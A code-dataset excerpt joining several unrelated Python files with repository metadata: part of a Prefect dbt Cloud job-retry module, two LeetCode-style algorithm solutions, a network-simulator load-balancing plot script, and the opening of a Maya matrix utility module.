f\"{command_start} {select_arg} {run_nodes} {command_end}\"\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(\n exe_command\n )\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n steps_override.append(modified_command)\n\n if trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = trigger_job_run_options.copy()\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n\n@flow(\n name=\"Retry subset of dbt Cloud job run and wait for completion\",\n description=(\n \"Retries a subset of dbt Cloud job run, filtered by select statuses, \"\n \"and waits for the triggered retry to complete.\"\n ),\n)\nasync def retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n run_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n) -> Dict:\n \"\"\"\n Flow that retrys a subset of dbt Cloud job run, filtered by select statuses,\n and waits for the triggered retry to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n run_id: The ID of the job run to retry.\n\n Raises:\n ValueError: If `trigger_job_run_options.steps_override` is set by the user.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Retry a subset of models in a dbt Cloud job run and wait for completion:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import 
retry_dbt_cloud_job_run_subset_and_wait_for_completion\n\n @flow\n def retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow():\n credentials = DbtCloudCredentials.load(\"MY_BLOCK_NAME\")\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=credentials,\n run_id=88640123,\n )\n\n retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow()\n ```\n \"\"\" # noqa\n if trigger_job_run_options and trigger_job_run_options.steps_override is not None:\n raise ValueError(\n \"Do not set `steps_override` in `trigger_job_run_options` \"\n \"because this flow will automatically set it\"\n )\n\n run_info_future = await get_dbt_cloud_run_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n include_related=[\"run_steps\"],\n )\n run_info = await run_info_future.result()\n\n job_id = run_info[\"job_id\"]\n job_info_future = await get_dbt_cloud_job_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n )\n job_info = await job_info_future.result()\n\n trigger_job_run_options_override = await _build_trigger_job_run_options(\n dbt_cloud_credentials=dbt_cloud_credentials,\n trigger_job_run_options=trigger_job_run_options,\n run_id=run_id,\n run_info=run_info,\n job_info=job_info,\n )\n\n # to circumvent `RuntimeError: The task runner is already started!`\n flow_run_context = FlowRunContext.get()\n task_runner_type = type(flow_run_context.task_runner)\n\n run_data = await trigger_dbt_cloud_job_run_and_wait_for_completion.with_options(\n task_runner=task_runner_type()\n )(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n retry_filtered_models_attempts=0,\n trigger_job_run_options=trigger_job_run_options_override,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n return run_data\n\n\nclass DbtCloudJobRun(JobRun): # NOT A BLOCK\n \"\"\"\n Class that holds the information and methods to interact\n with the resulting run of a dbt Cloud job.\n \"\"\"\n\n def __init__(self, run_id: int, dbt_cloud_job: \"DbtCloudJob\"):\n self.run_id = run_id\n self._dbt_cloud_job = dbt_cloud_job\n self._dbt_cloud_credentials = dbt_cloud_job.dbt_cloud_credentials\n\n @property\n def _log_prefix(self):\n return f\"dbt Cloud job {self._dbt_cloud_job.job_id} run {self.run_id}.\"\n\n async def _wait_until_state(\n self,\n in_final_state_fn: Awaitable[Callable],\n get_state_fn: Awaitable[Callable],\n log_state_fn: Callable = None,\n timeout_seconds: int = 60,\n interval_seconds: int = 1,\n ):\n \"\"\"\n Wait until the job run reaches a specific state.\n\n Args:\n in_final_state_fn: An async function that accepts a run state\n and returns a boolean indicating whether the job run is\n in a final state.\n get_state_fn: An async function that returns\n the current state of the job run.\n log_state_fn: A callable that accepts a run\n state and makes it human readable.\n timeout_seconds: The maximum amount of time, in seconds, to wait\n for the job run to reach the final state.\n interval_seconds: The number of seconds to wait between checks of\n the job run's state.\n \"\"\"\n start_time = time.time()\n last_state = run_state = None\n while not in_final_state_fn(run_state):\n run_state = await get_state_fn()\n if run_state != last_state:\n if self.logger is not None:\n self.logger.info(\n \"%s has new state: %s\",\n self._log_prefix,\n log_state_fn(run_state),\n )\n last_state = run_state\n\n elapsed_time_seconds = time.time() - start_time\n if elapsed_time_seconds > timeout_seconds:\n raise 
DbtCloudJobRunTimedOut(\n f\"Max wait time of {timeout_seconds} \"\n \"seconds exceeded while waiting\"\n )\n await asyncio.sleep(interval_seconds)\n\n @sync_compatible\n async def get_run(self) -> Dict[str, Any]:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run data.\n\n Returns:\n The run data.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run(self.run_id)\n except HTTPStatusError as ex:\n raise DbtCloudGetRunFailed(extract_user_message(ex)) from ex\n run_data = response.json()[\"data\"]\n return run_data\n\n @sync_compatible\n async def get_status_code(self) -> int:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run status.\n\n Returns:\n The run status code.\n \"\"\"\n run_data = await self.get_run()\n run_status_code = run_data.get(\"status\")\n return run_status_code\n\n @sync_compatible\n async def wait_for_completion(self) -> None:\n \"\"\"\n Waits for the job run to reach a terminal state.\n \"\"\"\n await self._wait_until_state(\n in_final_state_fn=DbtCloudJobRunStatus.is_terminal_status_code,\n get_state_fn=self.get_status_code,\n log_state_fn=DbtCloudJobRunStatus,\n timeout_seconds=self._dbt_cloud_job.timeout_seconds,\n interval_seconds=self._dbt_cloud_job.interval_seconds,\n )\n\n @sync_compatible\n async def fetch_result(self, step: Optional[int] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the results from the job run. Since the results\n may not be ready, use wait_for_completion before calling this method.\n\n Args:\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n \"\"\"\n run_data = await self.get_run()\n run_status = DbtCloudJobRunStatus(run_data.get(\"status\"))\n if run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n async with self._dbt_cloud_credentials.get_administrative_client() as client: # noqa\n response = await client.list_run_artifacts(\n run_id=self.run_id, step=step\n )\n run_data[\"artifact_paths\"] = response.json()[\"data\"]\n self.logger.info(\"%s completed successfully!\", self._log_prefix)\n except HTTPStatusError as ex:\n raise DbtCloudListRunArtifactsFailed(extract_user_message(ex)) from ex\n return run_data\n elif run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(f\"{self._log_prefix} was cancelled.\")\n elif run_status == DbtCloudJobRunStatus.FAILED:\n raise DbtCloudJobRunFailed(f\"{self._log_prefix} has failed.\")\n else:\n raise DbtCloudJobRunIncomplete(\n f\"{self._log_prefix} is still running; \"\n \"use wait_for_completion() to wait until results are ready.\"\n )\n\n @sync_compatible\n async def get_run_artifacts(\n self,\n path: Literal[\"manifest.json\", \"catalog.json\", \"run_results.json\"],\n step: Optional[int] = None,\n ) -> Union[Dict[str, Any], str]:\n \"\"\"\n Get an artifact generated for a completed run.\n\n Args:\n path: The relative path to the run artifact.\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n\n Returns:\n The contents of the requested manifest. 
Returns a `Dict` if the\n requested artifact is a JSON file and a `str` otherwise.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run_artifact(\n run_id=self.run_id, path=path, step=step\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetRunArtifactFailed(extract_user_message(ex)) from ex\n\n if path.endswith(\".json\"):\n artifact_contents = response.json()\n else:\n artifact_contents = response.text\n return artifact_contents\n\n def _select_unsuccessful_commands(\n self,\n run_results: List[Dict[str, Any]],\n command_components: List[str],\n command: str,\n exe_command: str,\n ) -> List[str]:\n \"\"\"\n Select nodes that were not successful and rebuild a command.\n \"\"\"\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(select_arg)\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\" # noqa\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(exe_command)\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n return modified_command\n\n async def _build_trigger_job_run_options(\n self,\n job: Dict[str, Any],\n run: Dict[str, Any],\n ) -> TriggerJobRunOptions:\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job.get(\"generate_docs\", False)\n generate_sources = job.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if 
exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (\n is_exe_command and is_skipped\n ):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact = await self.get_run_artifacts(\n \"run_results.json\", run_step[\"index\"]\n )\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes\n # for those run commands\n run_results = run_artifact[\"results\"]\n modified_command = self._select_unsuccessful_commands(\n run_results=run_results,\n command_components=command_components,\n command=command,\n exe_command=exe_command,\n )\n steps_override.append(modified_command)\n\n if self._dbt_cloud_job.trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = (\n self._dbt_cloud_job.trigger_job_run_options.copy()\n )\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n @sync_compatible\n async def retry_failed_steps(self) -> \"DbtCloudJobRun\": # noqa: F821\n \"\"\"\n Retries steps that did not complete successfully in a run.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n job = await self._dbt_cloud_job.get_job()\n run = await self.get_run()\n\n trigger_job_run_options_override = await self._build_trigger_job_run_options(\n job=job, run=run\n )\n\n num_steps = len(trigger_job_run_options_override.steps_override)\n if num_steps == 0:\n self.logger.info(f\"{self._log_prefix} does not have any steps to retry.\")\n else:\n self.logger.info(f\"{self._log_prefix} has {num_steps} steps to retry.\")\n run = await self._dbt_cloud_job.trigger(\n trigger_job_run_options=trigger_job_run_options_override,\n )\n return run\n\n\nclass DbtCloudJob(JobBlock):\n \"\"\"\n Block that holds the information and methods to interact with a dbt Cloud job.\n\n Attributes:\n dbt_cloud_credentials: The credentials to use to authenticate with dbt Cloud.\n job_id: The id of the dbt Cloud job.\n timeout_seconds: The number of seconds to wait for the job to complete.\n interval_seconds:\n The number of seconds to wait between polling for job completion.\n trigger_job_run_options: The options to use when triggering a job run.\n\n Examples:\n Load a configured dbt Cloud job block.\n ```python\n from prefect_dbt.cloud import DbtCloudJob\n\n dbt_cloud_job = DbtCloudJob.load(\"BLOCK_NAME\")\n ```\n\n Triggers a dbt Cloud job, waits for completion, and fetches the results.\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n\n @flow\n def dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob.load(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=154217\n )\n 
dbt_cloud_job_run = dbt_cloud_job.trigger()\n dbt_cloud_job_run.wait_for_completion()\n dbt_cloud_job_run.fetch_result()\n return dbt_cloud_job_run\n\n dbt_cloud_job_flow()\n ```\n \"\"\"\n\n _block_type_name = \"dbt Cloud Job\"\n _logo_url = \"https://images.ctfassets.net/gm98wzqotmnx/5zE9lxfzBHjw3tnEup4wWL/9a001902ed43a84c6c96d23b24622e19/dbt-bit_tm.png?h=250\" # noqa\n _documentation_url = \"https://prefecthq.github.io/prefect-dbt/cloud/jobs/#prefect_dbt.cloud.jobs.DbtCloudJob\" # noqa\n\n dbt_cloud_credentials: DbtCloudCredentials = Field(\n default=...,\n description=\"The dbt Cloud credentials to use to authenticate with dbt Cloud.\",\n ) # noqa: E501\n job_id: int = Field(\n default=..., description=\"The id of the dbt Cloud job.\", title=\"Job ID\"\n )\n timeout_seconds: int = Field(\n default=900,\n description=\"The number of seconds to wait for the job to complete.\",\n )\n interval_seconds: int = Field(\n default=10,\n description=\"The number of seconds to wait between polling for job completion.\",\n )\n trigger_job_run_options: TriggerJobRunOptions = Field(\n default_factory=TriggerJobRunOptions,\n description=\"The options to use when triggering a job run.\",\n )\n\n @sync_compatible\n async def get_job(self, order_by: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"\n Retrieve information about a dbt Cloud job.\n\n Args:\n order_by: The field to order the results by.\n\n Returns:\n The job data.\n \"\"\"\n try:\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=self.job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n @sync_compatible\n async def trigger(\n self, trigger_job_run_options: Optional[TriggerJobRunOptions] = None\n ) -> DbtCloudJobRun:\n \"\"\"\n Triggers a dbt Cloud job.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n try:\n trigger_job_run_options = (\n trigger_job_run_options or self.trigger_job_run_options\n )\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(\n job_id=self.job_id, options=trigger_job_run_options\n )\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n run_id = run_data.get(\"id\")\n run = DbtCloudJobRun(\n dbt_cloud_job=self,\n run_id=run_id,\n )\n self.logger.info(\n f\"dbt Cloud job {self.job_id} run {run_id} successfully triggered. 
\"\n f\"You can view the status of this run at \"\n f\"https://{self.dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{self.dbt_cloud_credentials.account_id}/projects/\"\n f\"{run_data['project_id']}/runs/{run_id}/\"\n )\n return run\n\n\n@flow\nasync def run_dbt_cloud_job(\n dbt_cloud_job: DbtCloudJob,\n targeted_retries: int = 3,\n) -> Dict[str, Any]:\n \"\"\"\n Flow that triggers and waits for a dbt Cloud job run, retrying a\n subset of failed nodes if necessary.\n\n Args:\n dbt_cloud_job: Block that holds the information and\n methods to interact with a dbt Cloud job.\n targeted_retries: The number of times to retry failed steps.\n\n Examples:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n from prefect_dbt.cloud.jobs import run_dbt_cloud_job\n\n @flow\n def run_dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob(\n dbt_cloud_credentials=dbt_cloud_credentials, job_id=154217\n )\n return run_dbt_cloud_job(dbt_cloud_job=dbt_cloud_job)\n\n run_dbt_cloud_job_flow()\n ```\n \"\"\"\n logger = get_run_logger()\n\n run = await task(dbt_cloud_job.trigger.aio)(dbt_cloud_job)\n while targeted_retries > 0:\n try:\n await task(run.wait_for_completion.aio)(run)\n result = await task(run.fetch_result.aio)(run)\n return result\n except DbtCloudJobRunFailed:\n logger.info(\n f\"Retrying job run with ID: {run.run_id} \"\n f\"{targeted_retries} more times\"\n )\n run = await task(run.retry_failed_steps.aio)(run)\n targeted_retries -= 1\n","repo_name":"PrefectHQ/prefect-dbt","sub_path":"prefect_dbt/cloud/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":43411,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"16"} +{"seq_id":"22853360377","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head: return None\n\n node = ListNode()\n start = node\n current_val = 101\n\n while head:\n if head.val != current_val:\n node.next = head\n node = node.next\n current_val = head.val\n head = head.next\n node.next = None\n\n return start.next\n","repo_name":"jinhongliu6688/leetcode-algorithms","sub_path":"83-remove-duplicates-from-sorted-list/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70111962889","text":"from multiprocessing import Pool\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.palettes import Category20 as palette\nimport itertools\nimport tqdm\nimport numpy as np\nfrom network_simulator.components import simulator\nfrom network_simulator.helpers import writeSimCache, readSimCache\n\ndef main():\n return simulator(g_init_vars, g_aplist, g_usrlist)\n\ndef loadBalancing(init_vars, aplist, usrlist):\n global g_init_vars, g_aplist, g_usrlist\n\n g_init_vars = init_vars\n g_aplist = aplist\n g_usrlist = usrlist\n \n plot_from_saved = 1\n total_runs = range(20)\n usr_limit = np.arange(30, 120, 5)\n _output = {}\n\n _sim_dict_axes = {\n \"axes1\" : {\n \"param\" : \"No Policy - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes2\" : {\n \"param\" : \"Cheapest Users - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 5,\n 
\"SMART_PARAM\" : [0.01, 12]\n },\n \"axes3\" : {\n \"param\" : \"No Policy - UCB1\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes4\" : {\n \"param\" : \"Cheapest Users - UCB1\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes5\" : {\n \"param\" : \"No Transmission Policy - Shared Evenly\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes6\" : {\n \"param\" : \"Cheapest Users - Shared Evenly\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes7\" : {\n \"param\" : \"No Transmission Policy - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes8\" : {\n \"param\" : \"Cheapest Users - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes9\" : {\n \"param\" : \"No Transmission Policy - AP Energy Use\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes10\" : {\n \"param\" : \"Cheapest Users - AP Energy Use\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes11\" : {\n \"param\" : \"No Transmission Policy - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 4,\n },\n \"axes12\" : {\n \"param\" : \"Cheapest Users - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 4,\n }\n }\n\n if plot_from_saved == 0:\n\n bar = tqdm.tqdm(desc=\"Load Balancing\", total=len(_sim_dict_axes.keys()) * len(usr_limit))\n\n init_vars[\"LOAD_BALANCE\"] = 0\n\n # Run once for no Load Balancing\n for axes in _sim_dict_axes.values():\n\n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n if init_vars[\"SHARE_ENERGY\"] == 6 or init_vars[\"SHARE_ENERGY\"] == 5:\n init_vars[\"SMART_PARAM\"] == axes[\"SMART_PARAM\"]\n\n _avg_serviced_users = []\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users = sum([result.get() for result in _serviced_users]) / len(total_runs)\n _output[axes[\"param\"] + \" No Balancing\"] = { \"result\" : [_avg_serviced_users]*len(usr_limit) }\n bar.update(1)\n init_vars[\"LOAD_BALANCE\"] = 1\n\n for axes in _sim_dict_axes.values():\n \n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n _avg_serviced_users = []\n\n for num in usr_limit:\n init_vars[\"USR_LIMIT\"] = num\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users.append(sum([result.get() for result in _serviced_users]) / len(total_runs))\n\n _output[axes[\"param\"]] = { \"result\" : _avg_serviced_users }\n bar.update(1)\n bar.close()\n writeSimCache(\"LoadBalanceM\", _output)\n else:\n _output = readSimCache(\"LoadBalanceM\")\n\n output_file(\"interactive/loadbalancing.html\")\n\n TOOLTIPS = [\n (\"(x, y)\", \"($x, $y)\"),\n (\"desc\", \"$name\")\n ]\n \n # Plot colours\n colors = itertools.cycle(palette[12])\n\n p = figure(width=1200, height=800, x_axis_label='Total Number of Users', y_axis_label='Total Number of Serviced Users', tooltips=TOOLTIPS, output_backend='svg')\n count = 0\n\n for key, value in _output.items():\n\n count += 1\n\n print(key + \" : \" + str(sum(value[\"result\"])/len(value[\"result\"])))\n if count >= 13:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3, line_dash=\"dashed\")\n else:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3)\n\n # p.legend[0].orientation = 
\"vertical\"\n # legend_ref = p.legend[0] \n # p.legend[0] = None\n p.xaxis.axis_label_text_font_size='20px'\n p.xaxis.major_label_text_font_size='20px'\n p.yaxis.axis_label_text_font_size='20px'\n p.yaxis.major_label_text_font_size='20px'\n p.legend.label_text_font_size='18px' \n p.legend[0].orientation = \"vertical\"\n legend_ref = p.legend[0] \n p.add_layout(legend_ref, \"right\")\n\n show(p)\n p.toolbar.logo = None\n p.toolbar_location = None\n\n return p\n","repo_name":"brokenax3/network-simulator-py","sub_path":"network_simulator/test/testLoadBalancing.py","file_name":"testLoadBalancing.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5109407618","text":"# key: memorize the all the stop points\n# time complexity: O(M*N)\n# space complexity: O(M*N)\nimport collections\n\n\nclass Solution(object):\n def hasPath(self, maze, start, destination):\n \"\"\"\n :type maze: List[List[int]]\n :type start: List[int]\n :type destination: List[int]\n :rtype: bool\n \"\"\"\n\n queue = collections.deque([])\n m, n, = len(maze), len(maze[0])\n\n def isWall(pos):\n i, j = pos\n if 0 <= i < m and 0 <= j < n:\n return maze[i][j] == 1\n return True\n\n def bounce(pos):\n i, j = pos\n return list(filter(lambda item: not isWall(item[0]), [[(i-1, j), (-1, 0)], [(i+1, j), (1, 0)], [(i, j-1), (0, -1)], [(i, j+1), (0, 1)]]))\n\n def move(p, d): return (p[0]+d[0], p[1]+d[1])\n visited = {}\n\n queue.extend(bounce(start))\n while queue:\n pos, direct = queue.popleft()\n nxt = move(pos, direct)\n while not isWall(nxt):\n pos = nxt\n nxt = move(nxt, direct)\n\n if tuple(destination) == pos:\n return True\n if visited.get(pos, False):\n continue\n visited[pos] = True\n queue.extend(bounce(pos))\n return False\n","repo_name":"simonzg/leetcode-solutions","sub_path":"490.The_Maze.py","file_name":"490.The_Maze.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2864021672","text":"# -*- coding: utf-8 -*-\n\"\"\"============================================================================\nModule descriptions.\n\n\n__AUTHOR__ = 'minsung'\n__UPDATE__ = 20210707\n\n:Example:\nfrom lib.m_lib import NurbsCurveNode\nreload(NurbsCurveNode)\n\nblah blah blah blah blah blah\nblah blah blah blah blah blah\n============================================================================\"\"\"\n#\n# when start coding 3 empty lines.\n#\nimport math\nfrom pymel import util\nfrom pymel.core import *\nimport maya.OpenMaya as om\nimport pymel.core.datatypes as dt\n\ndef hierarchy_(object_):\n for i,obj in enumerate(object_):\n if i>0:\n parent(obj, object_[i-1])\n\ndef getChildren_(object_, type_=None):\n \"\"\"Get the childrens from top object\n\n Arguments:\n object_ (node): transform node\n type_ (type): node type\n\n Returns:\n list : childrens list\n\n \"\"\"\n object_ = PyNode(object_)\n if not type_:\n type_ = 'transform'\n child_ = object_.listRelatives(ad=1, c=1, typ=type_)\n child_ = child_ + [object_]\n child_.reverse()\n return child_\n\ndef divide_in_two(object_):\n divideNum = int(len(object_)/2)\n items = object_[:divideNum]\n targets = object_[divideNum:]\n return items, targets\n\ndef get_transform(object_):\n _name = object_.name()\n trans = xform(_name, q=1, ws=1, rp=1 )\n rot = xform(_name, q=1, ws=1, ro=1 )\n return trans, rot\n\ndef getTransform(object_):\n return object_.getMatrix(worldSpace=True)\n\ndef 
set_trans_xform(object_, trans):\n xform(object_, r = 1, t = trans)\n\ndef set_rot_xform(object_, rot):\n xform(object_, r = 1, ro = rot)\n\ndef get_trans(object_):\n return object_.getMatrix(worldSpace=True)[-1][:-1]\n \ndef get_rot(object_):\n return xform(object_, q=1, ws=1, ro=1 )\n\ndef set_transform_(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n pos, rot = get_transform(item)\n set_trans_xform(targets[i], pos)\n set_rot_xform(targets[i], rot)\n\ndef getInverseTransform(object_):\n \"\"\"Get the object_ from inverse matrix\n\n Arguments:\n object_ (node): transform node\n\n Returns:\n matrix : inverse matrix\n\n \"\"\"\n return object_.getMatrix(worldSpace=True).inverse()\n\ndef getMultMatrix(mat1, mat2):\n \"\"\"Get the matrix from multiply\n\n Arguments:\n mat1 (matrix): The first input Matrix.\n mat2 (matrix): The second input Matrix.\n\n Returns:\n matrix : mult matrix\n\n \"\"\"\n return mat1*mat2\n\ndef matrixList_(matrix_):\n \"\"\"Get the list from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n\n Returns:\n list : matrix array list\n\n \"\"\"\n list_=[]\n array_ = matrix_.get()\n for i,a in enumerate(array_):\n for j in a:\n list_.append(j)\n return list_\n\ndef setMatrixAxis_(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n flipMatrix = dt.Matrix()\n \n if axis_ == 'x':\n matrix_value=[-1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'y':\n matrix_value=[1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'z':\n matrix_value=[1, 0, 0, 0, 0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1]\n \n \n if matrix_value:\n om.MScriptUtil.createMatrixFromList(matrix_value, flipMatrix)\n \n return matrix_*flipMatrix\n\ndef 